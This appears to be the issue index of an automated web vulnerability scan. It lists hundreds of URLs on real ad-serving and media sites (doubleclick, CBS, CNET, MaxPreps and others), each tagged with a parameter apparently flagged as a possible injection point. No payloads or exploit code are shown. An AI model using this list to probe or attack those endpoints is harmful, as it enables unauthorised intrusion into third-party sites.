http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [e parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [epartner parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [event parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [h parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [l parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [nd parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [o parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [oepartner parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [orh parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [p parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pdom parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pg parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pid parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pp parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ppartner parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pt parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ra parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [rqid parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sg parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [site parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sz parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [t parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [b parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [count parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [e parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [epartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [event parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [h parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [l parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [nd parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [o parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [oepartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [orh parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [p parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pdom parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pp parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ppartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pt parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ra parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [rqid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [site parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sz parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [t parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [b parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [count parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [e parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [epartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [event parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [h parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [l parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [nd parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [o parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [oepartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [orh parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [p parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pdom parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pp parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ppartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pt parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ra parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [rqid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [site parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sz parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [t parameter]
http://ad.doubleclick.net/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview [source parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]
http://adimg.tv.com/mac-ad [&&&&&&&&adfile parameter]
http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]
http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]
http://apex.com.com/aws/rest/v1.0/arrowUser [callback parameter]
http://api.cnet.com/restApi/v1.0/videoSearch [callback parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://cdn.widgetserver.com/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/ [REST URL parameter 14]
http://cdn.widgetserver.com/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/ [REST URL parameter 4]
http://cdn.widgetserver.com/syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46ece/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669/u/3/ [REST URL parameter 18]
http://cdn.widgetserver.com/syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46ece/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669/u/3/ [REST URL parameter 4]
http://dealnews.com/lw/log_syndication.php [REST URL parameter 1]
http://dealnews.com/synd/2.1/widget.php [REST URL parameter 1]
http://dealnews.com/synd/2.1/widget.php [REST URL parameter 2]
http://dealnews.com/synd/2.1/widget.php [REST URL parameter 3]
http://domainhelp.search.com/search [d parameter]
http://domainhelp.search.com/search [d parameter]
http://domainhelp.search.com/search [d parameter]
http://domainhelp.search.com/search [q parameter]
http://finance.bnet.com/bnet [Module parameter]
http://finance.bnet.com/bnet [REST URL parameter 1]
http://finance.bnet.com/bnet [name of an arbitrarily supplied request parameter]
http://flash.quantserve.com/quant.swf [lc parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter]
http://init.zopim.com/register [mID parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://linkdr.net/ [name of an arbitrarily supplied request parameter]
http://linkdr.net/favicon.ico [REST URL parameter 1]
http://linkdr.net/favicon.ico [name of an arbitrarily supplied request parameter]
http://mads.bnet.com/mac-ad [ADREQ&beacon parameter]
http://mads.bnet.com/mac-ad [CELT parameter]
http://mads.bnet.com/mac-ad [CID parameter]
http://mads.bnet.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.bnet.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.bnet.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.bnet.com/mac-ad [IREFER_HOST parameter]
http://mads.bnet.com/mac-ad [NCAT parameter]
http://mads.bnet.com/mac-ad [PAGESTATE parameter]
http://mads.bnet.com/mac-ad [PAGESTATE parameter]
http://mads.bnet.com/mac-ad [PTYPE parameter]
http://mads.bnet.com/mac-ad [SITE parameter]
http://mads.bnet.com/mac-ad [cookiesOn parameter]
http://mads.bnet.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.bnet.com/mac-ad [x-cb parameter]
http://mads.cbs.com/mac-ad [ADREQ&SP parameter]
http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbs.com/mac-ad [BRAND parameter]
http://mads.cbs.com/mac-ad [BRAND parameter]
http://mads.cbs.com/mac-ad [CELT parameter]
http://mads.cbs.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]
http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]
http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbs.com/mac-ad [NCAT parameter]
http://mads.cbs.com/mac-ad [NCAT parameter]
http://mads.cbs.com/mac-ad [NODE parameter]
http://mads.cbs.com/mac-ad [PAGESTATE parameter]
http://mads.cbs.com/mac-ad [PAGESTATE parameter]
http://mads.cbs.com/mac-ad [POS parameter]
http://mads.cbs.com/mac-ad [PTYPE parameter]
http://mads.cbs.com/mac-ad [PTYPE parameter]
http://mads.cbs.com/mac-ad [SITE parameter]
http://mads.cbs.com/mac-ad [SITE parameter]
http://mads.cbs.com/mac-ad [cookiesOn parameter]
http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbs.com/mac-ad [x-cb parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbsnews.com/mac-ad [BRAND parameter]
http://mads.cbsnews.com/mac-ad [BRAND parameter]
http://mads.cbsnews.com/mac-ad [BRAND parameter]
http://mads.cbsnews.com/mac-ad [CELT parameter]
http://mads.cbsnews.com/mac-ad [CID parameter]
http://mads.cbsnews.com/mac-ad [CID parameter]
http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]
http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]
http://mads.cbsnews.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbsnews.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]
http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]
http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]
http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]
http://mads.cbsnews.com/mac-ad [NCAT parameter]
http://mads.cbsnews.com/mac-ad [NCAT parameter]
http://mads.cbsnews.com/mac-ad [NODE parameter]
http://mads.cbsnews.com/mac-ad [NODE parameter]
http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]
http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]
http://mads.cbsnews.com/mac-ad [POS parameter]
http://mads.cbsnews.com/mac-ad [POS parameter]
http://mads.cbsnews.com/mac-ad [PTYPE parameter]
http://mads.cbsnews.com/mac-ad [PTYPE parameter]
http://mads.cbsnews.com/mac-ad [SITE parameter]
http://mads.cbsnews.com/mac-ad [SITE parameter]
http://mads.cbsnews.com/mac-ad [cookiesOn parameter]
http://mads.cbsnews.com/mac-ad [cookiesOn parameter]
http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbsnews.com/mac-ad [x-cb parameter]
http://mads.cbsnews.com/mac-ad [x-cb parameter]
http://mads.cbssports.com/mac-ad [ADREQ&SP parameter]
http://mads.cbssports.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [CELT parameter]
http://mads.cbssports.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbssports.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbssports.com/mac-ad [DVAR_EXCLUDE parameter]
http://mads.cbssports.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbssports.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbssports.com/mac-ad [DVAR_SESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_SESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_USER parameter]
http://mads.cbssports.com/mac-ad [DVAR_USER parameter]
http://mads.cbssports.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbssports.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbssports.com/mac-ad [IREFER_HOST parameter]
http://mads.cbssports.com/mac-ad [META&ADSEPARATOR parameter]
http://mads.cbssports.com/mac-ad [NCAT parameter]
http://mads.cbssports.com/mac-ad [NCAT parameter]
http://mads.cbssports.com/mac-ad [NODE parameter]
http://mads.cbssports.com/mac-ad [NODE parameter]
http://mads.cbssports.com/mac-ad [PAGESTATE parameter]
http://mads.cbssports.com/mac-ad [PAGESTATE parameter]
http://mads.cbssports.com/mac-ad [PGUID parameter]
http://mads.cbssports.com/mac-ad [PGUID parameter]
http://mads.cbssports.com/mac-ad [POS parameter]
http://mads.cbssports.com/mac-ad [PTYPE parameter]
http://mads.cbssports.com/mac-ad [SITE parameter]
http://mads.cbssports.com/mac-ad [adfile parameter]
http://mads.cbssports.com/mac-ad [celt parameter]
http://mads.cbssports.com/mac-ad [cookiesOn parameter]
http://mads.cbssports.com/mac-ad [cookiesOn parameter]
http://mads.cbssports.com/mac-ad [has_takeover parameter]
http://mads.cbssports.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbssports.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbssports.com/mac-ad [x-cb parameter]
http://mads.cbssports.com/mac-ad [x-cb parameter]
http://mads.cnet.com/mac-ad [&&&&&&adfile parameter]
http://mads.cnet.com/mac-ad [&adfile parameter]
http://mads.cnet.com/mac-ad [ADREQ&beacon parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [CELT parameter]
http://mads.cnet.com/mac-ad [OVERGIF parameter]
http://mads.cnet.com/mac-ad [PAGESTATE parameter]
http://mads.cnet.com/mac-ad [SITE parameter]
http://mads.cnet.com/mac-ad [SITE parameter]
http://mads.cnet.com/mac-ad [SITE parameter]
http://mads.cnet.com/mac-ad [_RGROUP parameter]
http://mads.gamespot.com/mac-ad [ADREQ&beacon parameter]
http://mads.gamespot.com/mac-ad [PAGESTATE parameter]
http://mads.gamespot.com/mac-ad [SITE parameter]
http://mads.maxpreps.com/mac-ad [BRAND parameter]
http://mads.maxpreps.com/mac-ad [BRAND parameter]
http://mads.maxpreps.com/mac-ad [CLIENT:ID parameter]
http://mads.maxpreps.com/mac-ad [DVAR_FIRSTPAGE parameter]
http://mads.maxpreps.com/mac-ad [DVAR_SESSION parameter]
http://mads.maxpreps.com/mac-ad [NCAT parameter]
http://mads.maxpreps.com/mac-ad [NCAT parameter]
http://mads.maxpreps.com/mac-ad [PAGESTATE parameter]
http://mads.maxpreps.com/mac-ad [PAGESTATE parameter]
http://mads.maxpreps.com/mac-ad [POS parameter]
http://mads.maxpreps.com/mac-ad [POS parameter]
http://mads.maxpreps.com/mac-ad [PTYPE parameter]
http://mads.maxpreps.com/mac-ad [SITE parameter]
http://mads.maxpreps.com/mac-ad [SITE parameter]
http://mads.maxpreps.com/mac-ad [SP parameter]
http://mads.maxpreps.com/mac-ad [SP parameter]
http://mads.maxpreps.com/mac-ad [celt parameter]
http://mads.maxpreps.com/mac-ad [cookiesOn parameter]
http://mads.maxpreps.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.maxpreps.com/mac-ad [x-cb parameter]
http://mads.metacritic.com/mac-ad [ADREQ&beacon parameter]
http://mads.metacritic.com/mac-ad [PAGESTATE parameter]
http://mads.metacritic.com/mac-ad [SITE parameter]
http://mads.mysimon.com/mac-ad [ADREQ&beacon parameter]
http://mads.mysimon.com/mac-ad [PAGESTATE parameter]
http://mads.mysimon.com/mac-ad [SITE parameter]
http://mads.tv.com/mac-ad [ADREQ&beacon parameter]
http://mads.tv.com/mac-ad [PAGESTATE parameter]
http://mads.tv.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [ADREQ&beacon parameter]
http://mads.urbanbaby.com/mac-ad [BRAND parameter]
http://mads.urbanbaby.com/mac-ad [CELT parameter]
http://mads.urbanbaby.com/mac-ad [PAGESTATE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [_RGROUP parameter]
http://mads.urbanbaby.com/mac-ad [beacon parameter]
http://mads.urbanbaby.com/mac-ad [site parameter]
http://nmp.newsgator.com/NGBuzz//buzz.ashx [_dsrId parameter]
http://nmp.newsgator.com/NGBuzz//gateway.ashx/ngdsr/ [_dsrId parameter]
http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]
http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]
http://nmp.newsgator.com/ngbuzz//buzz.ashx [buzzId parameter]
http://nmp.newsgator.com/ngbuzz//buzz.ashx [name of an arbitrarily supplied request parameter]
http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
